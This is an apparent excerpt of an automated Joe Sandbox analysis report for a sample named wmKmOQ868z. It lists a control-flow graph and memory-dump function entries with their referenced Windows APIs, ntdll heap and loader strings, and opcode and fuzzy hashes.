                                          control_flow_graph 1296 32950274-32950296 call 328f7e54 1299 329502b5-329502cd call 328976b2 1296->1299 1300 32950298-329502b0 RtlDebugPrintTimes 1296->1300 1304 329506f7 1299->1304 1305 329502d3-329502e9 1299->1305 1306 32950751-32950760 1300->1306 1309 329506fa-3295074e call 32950766 1304->1309 1307 329502f0-329502f2 1305->1307 1308 329502eb-329502ee 1305->1308 1310 329502f3-3295030a 1307->1310 1308->1310 1309->1306 1312 329506b1-329506ba GetPEB 1310->1312 1313 32950310-32950313 1310->1313 1317 329506bc-329506d7 GetPEB call 3289b970 1312->1317 1318 329506d9-329506de call 3289b970 1312->1318 1313->1312 1315 32950319-32950322 1313->1315 1321 32950324-3295033b call 328affb0 1315->1321 1322 3295033e-32950351 call 32950cb5 1315->1322 1324 329506e3-329506f4 call 3289b970 1317->1324 1318->1324 1321->1322 1331 32950353-3295035a 1322->1331 1332 3295035c-32950370 call 3289758f 1322->1332 1324->1304 1331->1332 1335 32950376-32950382 GetPEB 1332->1335 1336 329505a2-329505a7 1332->1336 1337 32950384-32950387 1335->1337 1338 329503f0-329503fb 1335->1338 1336->1309 1339 329505ad-329505b9 GetPEB 1336->1339 1340 329503a6-329503ab call 3289b970 1337->1340 1341 32950389-329503a4 GetPEB call 3289b970 1337->1341 1344 32950401-32950408 1338->1344 1345 329504e8-329504fa call 328b27f0 1338->1345 1342 32950627-32950632 1339->1342 1343 329505bb-329505be 1339->1343 1356 329503b0-329503d1 call 3289b970 GetPEB 1340->1356 1341->1356 1342->1309 1346 32950638-32950643 1342->1346 1348 329505c0-329505db GetPEB call 3289b970 1343->1348 1349 329505dd-329505e2 call 3289b970 1343->1349 1344->1345 1352 3295040e-32950417 1344->1352 1368 32950590-3295059d call 329511a4 call 32950cb5 1345->1368 1369 32950500-32950507 1345->1369 1346->1309 1353 32950649-32950654 1346->1353 1367 329505e7-329505fb call 3289b970 1348->1367 1349->1367 1359 32950419-32950429 1352->1359 1360 32950438-3295043c 1352->1360 1353->1309 1362 3295065a-32950663 GetPEB 1353->1362 1356->1345 1389 329503d7-329503eb 1356->1389 1359->1360 1361 3295042b-32950435 call 3295dac6 1359->1361 1363 3295044e-32950454 1360->1363 1364 3295043e-3295044c call 328d3bc9 1360->1364 1361->1360 1372 32950665-32950680 GetPEB call 3289b970 1362->1372 1373 32950682-32950687 call 3289b970 1362->1373 1375 32950457-32950460 1363->1375 1364->1375 1399 329505fe-32950608 GetPEB 1367->1399 1368->1336 1378 32950512-3295051a 1369->1378 1379 32950509-32950510 1369->1379 1396 3295068c-329506ac call 329486ba call 3289b970 1372->1396 1373->1396 1387 32950472-32950475 1375->1387 1388 32950462-32950470 1375->1388 1380 3295051c-3295052c 1378->1380 1381 32950538-3295053c 1378->1381 1379->1378 1380->1381 1391 3295052e-32950533 call 3295dac6 1380->1391 1393 3295056c-32950572 1381->1393 1394 3295053e-32950551 call 328d3bc9 1381->1394 1397 329504e5 1387->1397 1398 32950477-3295047e 1387->1398 1388->1387 1389->1345 1391->1381 1404 32950575-3295057c 1393->1404 1410 32950563 1394->1410 1411 32950553-32950561 call 328cfe99 1394->1411 1396->1399 1397->1345 1398->1397 1403 32950480-3295048b 1398->1403 1399->1309 1405 3295060e-32950622 1399->1405 1403->1397 1408 3295048d-32950496 GetPEB 1403->1408 1404->1368 1409 3295057e-3295058e 1404->1409 1405->1309 1413 329504b5-329504ba call 3289b970 1408->1413 1414 32950498-329504b3 GetPEB call 3289b970 1408->1414 1409->1368 1417 32950566-3295056a 1410->1417 1411->1417 1421 329504bf-329504dd call 329486ba call 3289b970 1413->1421 1414->1421 1417->1404 1421->1397
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                          • API String ID: 3446177414-1700792311
                                          • Opcode ID: b47e80aff081d10e6995336dece93da7146f3c309aa96c8e76ae6d441c2df615
                                          • Instruction ID: 276f3e86936f8b8dbda18188a55e67d58850db8a5297e67c179b3c68b1acca9a
                                          • Opcode Fuzzy Hash: b47e80aff081d10e6995336dece93da7146f3c309aa96c8e76ae6d441c2df615
                                          • Instruction Fuzzy Hash: 39D13039605684DFEB12CF68C440AADBBF5FF49714F668049E849AB322DB35D982CF10
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                          • API String ID: 3446177414-1745908468
                                          • Opcode ID: 9151eca6e3ca2be6419366e153a2bb3db2fc94704d881675df90e16ffc2c2a96
                                          • Instruction ID: c1841bf01ab0db089299a75b42173ec286fd94e2b3a7ad3fb61d3b7c0b86b904
                                          • Opcode Fuzzy Hash: 9151eca6e3ca2be6419366e153a2bb3db2fc94704d881675df90e16ffc2c2a96
                                          • Instruction Fuzzy Hash: EA910E39901646DFEB16CFA8C480AADBBF2FF49718F248059E855AB361CF759981CB10
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                          • API String ID: 0-3591852110
                                          • Opcode ID: bbdf95766d94bdf6d245c63b6e59b626a227136d84465e645987962687d56dad
                                          • Instruction ID: 273d2e0a38e1637c1c7e0ad5d6df6256ef6f7c4f42dfc567588767a95564d5e2
                                          • Opcode Fuzzy Hash: bbdf95766d94bdf6d245c63b6e59b626a227136d84465e645987962687d56dad
                                          • Instruction Fuzzy Hash: E2128E78604742DFEB25CF28C490BB6BBF5FF09B14F648459E8968B651DB38E881CB50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                          • API String ID: 0-3532704233
                                          • Opcode ID: eea7caea2c9134a89e061847ab1ceaf3d53dff210d47de22a36114e9a775046c
                                          • Instruction ID: f0579ae4155adca3982c1c20406ef99f780537ddd7527870508262bf3d89451f
                                          • Opcode Fuzzy Hash: eea7caea2c9134a89e061847ab1ceaf3d53dff210d47de22a36114e9a775046c
                                          • Instruction Fuzzy Hash: 9DB1CFB95083559FD715DF28C880B9BB7E8BF88758F41492EF898D7200DB70D909CB96
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                          • API String ID: 3446177414-3570731704
                                          • Opcode ID: 9a5cd742e3a4f4a7e887564d619de5a38b0133400ac680fa8b6de921fab17065
                                          • Instruction ID: 9204da3802b27ae9887c59132f087d14eb95a919901f6435c4d6f1c7fd0924f8
                                          • Opcode Fuzzy Hash: 9a5cd742e3a4f4a7e887564d619de5a38b0133400ac680fa8b6de921fab17065
                                          • Instruction Fuzzy Hash: 939258B9A01368CFEB24CF18C890B99B7B5BF45754F0581EAD84AAB351DB709E80CF51
                                          APIs
                                          • RtlDebugPrintTimes.NTDLL ref: 328CD959
                                            • Part of subcall function 328A4859: RtlDebugPrintTimes.NTDLL ref: 328A48F7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                          • API String ID: 3446177414-1975516107
                                          • Opcode ID: 70661af301becf38976f53d698f8b0563b0508aae63bc86c2ba9e2ae3d6e92c1
                                          • Instruction ID: 1b74a872df44f9faff9ccd9803a6ee976d2eb8f25af1a9ed9cb905b9e7b36a32
                                          • Opcode Fuzzy Hash: 70661af301becf38976f53d698f8b0563b0508aae63bc86c2ba9e2ae3d6e92c1
                                          • Instruction Fuzzy Hash: BE51D179A08359DFEB04EFA8C48079EFBB1FF48718F144859D8146B285DB74E986CB80
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                          • API String ID: 3446177414-3224558752
                                          • Opcode ID: e62b5717b2c782a6a08ba1c4bd3d59df7a719f8f06e78e948ec62a3dac403452
                                          • Instruction ID: 8ad86fdbaae0d4377e04d7f7b52362de2440a5cc318140183733e9d1cc01197a
                                          • Opcode Fuzzy Hash: e62b5717b2c782a6a08ba1c4bd3d59df7a719f8f06e78e948ec62a3dac403452
                                          • Instruction Fuzzy Hash: D9414379600758DFE702DF68C484B9AB3F8EF00368F1084A9D8158B790CF78E981CB91
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                          • API String ID: 3446177414-1222099010
                                          • Opcode ID: 2ad8fb402b542f26f19aa75901b5ec45eb2bad46088da9a684a166124ad5974d
                                          • Instruction ID: 15a8cf8d81e1d87563fe38c9b0ffc4ccadbab3bcf750beccbbb0c16c9a8b4719
                                          • Opcode Fuzzy Hash: 2ad8fb402b542f26f19aa75901b5ec45eb2bad46088da9a684a166124ad5974d
                                          • Instruction Fuzzy Hash: ED31E03D115798DFF712DB28C444B9AB7E8EF01B68F008094E85547B51CFB8F981CA12
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                          • API String ID: 0-3063724069
                                          • Opcode ID: 04c9a0bc08144525600116e3fcf1de021d8bd972011aad9067f9a992203735cc
                                          • Instruction ID: ff16cdddedaa5d30a3f8e68fb0a191b0a90a2bca4c6cfb71791e18fed1d546d3
                                          • Opcode Fuzzy Hash: 04c9a0bc08144525600116e3fcf1de021d8bd972011aad9067f9a992203735cc
                                          • Instruction Fuzzy Hash: 53D1C7B6806355AFF722CB54C840B9BB7ECAF84758F40492DFB9497250D7B4CD488B92
                                          Strings
                                          • @, xrefs: 3289D313
                                          • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 3289D262
                                          • @, xrefs: 3289D2AF
                                          • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 3289D146
                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 3289D2C3
                                          • Control Panel\Desktop\LanguageConfiguration, xrefs: 3289D196
                                          • @, xrefs: 3289D0FD
                                          • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3289D0CF
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                          • API String ID: 0-1356375266
                                          • Opcode ID: bce71c2d64750103720788cc615eaa0e27ab192b5b12a7afda6db92c892f7697
                                          • Instruction ID: 1838c88663ed28b7f03c241c8b82b5df289a24dd286fc4eb235d4e1145ba9ca7
                                          • Opcode Fuzzy Hash: bce71c2d64750103720788cc615eaa0e27ab192b5b12a7afda6db92c892f7697
                                          • Instruction Fuzzy Hash: 42A17E7A908345DFE311DF24D440B9BB7E8BF84769F40492EE99897240EBB4D908CF96
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-523794902
                                          • Opcode ID: e6f93f07475d35b08243c35575a91c13c6801f0ae9004f111643e0a237270683
                                          • Instruction ID: 4ef1dd88d9a52cba1b073017aa633427f7cadca0e8fddd797febf02778c9c644
                                          • Opcode Fuzzy Hash: e6f93f07475d35b08243c35575a91c13c6801f0ae9004f111643e0a237270683
                                          • Instruction Fuzzy Hash: 0742EF7D2083819FE709CF28D884BAABBE5FF94748F14496DE8998B351DB34D841CB91
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                          • API String ID: 0-122214566
                                          • Opcode ID: 6fb3584cd910d699ecfdcdadee8474f653131f03700be32b5a4c679129a0de53
                                          • Instruction ID: a0088026fb6158331de8042bf91c22cf5013e2243ebe1ddb70f0a8a10dbcaa56
                                          • Opcode Fuzzy Hash: 6fb3584cd910d699ecfdcdadee8474f653131f03700be32b5a4c679129a0de53
                                          • Instruction Fuzzy Hash: 54C1F479A00359AFEF148B6CC880BBEB7A5BF49314F5480ADEC15AB391DBB4C944C791
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-4253913091
                                          • Opcode ID: d4e591c265257a785227c9cdb563a587e780182f6bc12f070fb78fccb9b05aea
                                          • Instruction ID: 411a72ae52e47491c84140fcba719d61b36360ef9284f12b435fe99e01451e60
                                          • Opcode Fuzzy Hash: d4e591c265257a785227c9cdb563a587e780182f6bc12f070fb78fccb9b05aea
                                          • Instruction Fuzzy Hash: 08F1ADB8A04609DFEB15CF68C894B6AB7F5FF49344F1081A8E8159B391DB74E981CF90
                                          Strings
                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 329102BD
                                          • RTL: Re-Waiting, xrefs: 3291031E
                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 329102E7
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                          • API String ID: 0-2474120054
                                          • Opcode ID: dc30f2995363b90cee66baefd828a266503d74767cecd346216998fb2a964875
                                          • Instruction ID: 756d4b370ef0b56d2cdd39c1807156c5ea969a617452219323c95957cadc22ea
                                          • Opcode Fuzzy Hash: dc30f2995363b90cee66baefd828a266503d74767cecd346216998fb2a964875
                                          • Instruction Fuzzy Hash: 26E1DE78608745DFE715CF29C880B1AB7E0BF94364F100A2EF9A58B2E1DB75E845CB42
                                          Strings
                                          • Kernel-MUI-Language-Disallowed, xrefs: 328C5352
                                          • WindowsExcludedProcs, xrefs: 328C522A
                                          • Kernel-MUI-Number-Allowed, xrefs: 328C5247
                                          • Kernel-MUI-Language-SKU, xrefs: 328C542B
                                          • Kernel-MUI-Language-Allowed, xrefs: 328C527B
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                          • API String ID: 0-258546922
                                          • Opcode ID: f7a048e617abb8e2a857d8da716ad42bc5874ae844fea75e3497d666334c1974
                                          • Instruction ID: 4a048acc8ae2750e35e6d1e41eb68ca9d30f9e3179c04fb664f45d903273c8c2
                                          • Opcode Fuzzy Hash: f7a048e617abb8e2a857d8da716ad42bc5874ae844fea75e3497d666334c1974
                                          • Instruction Fuzzy Hash: 22F13B7AD01228EFDF05CFA8C990ADEBBB9EF48754F51406AE415B7210DBB4DA01CB90
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: 10b7178cf935202dbc1afc6e319c67dcb1a0623bfec4f33d6ba0d061f4cc9214
                                          • Instruction ID: 7d272d9d8547b5f0e0bd81b28894f74c0a42331c8b62ef67a1220858688c2edb
                                          • Opcode Fuzzy Hash: 10b7178cf935202dbc1afc6e319c67dcb1a0623bfec4f33d6ba0d061f4cc9214
                                          • Instruction Fuzzy Hash: 60F11876E002158FDB18CF6DC9A067EBBF5AF98310B59416DD856DB380EA34EA41CB50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                          • API String ID: 0-3061284088
                                          • Opcode ID: bdde91a5ea15d0a33f88b9d713ec428a55c8a5860e53cf10f089d3f5b9e911bb
                                          • Instruction ID: af9041ddd0343a28d07ec8372733146247015084ba40564c4bc8c6674fbe5b1d
                                          • Opcode Fuzzy Hash: bdde91a5ea15d0a33f88b9d713ec428a55c8a5860e53cf10f089d3f5b9e911bb
                                          • Instruction Fuzzy Hash: DD01F73E025284EEF319D71CE449FE277E4EF86B71F25409AE0144BA61DEB99C81C560
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                          • API String ID: 0-3178619729
                                          • Opcode ID: f603ded86f2bd4b7d0916f726f19ccf8a3ebbb4c72b6fd373a19218788532069
                                          • Instruction ID: 1f4337146f4a29fdc46f93874f532fa3f7d84c5fb41399f353ebba4e15edcd89
                                          • Opcode Fuzzy Hash: f603ded86f2bd4b7d0916f726f19ccf8a3ebbb4c72b6fd373a19218788532069
                                          • Instruction Fuzzy Hash: 8113AC79A00719CFEF18CF68C8907A9BBB1BF49304F1485ADD859AB381DB74A945CF90
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                          • API String ID: 0-2586055223
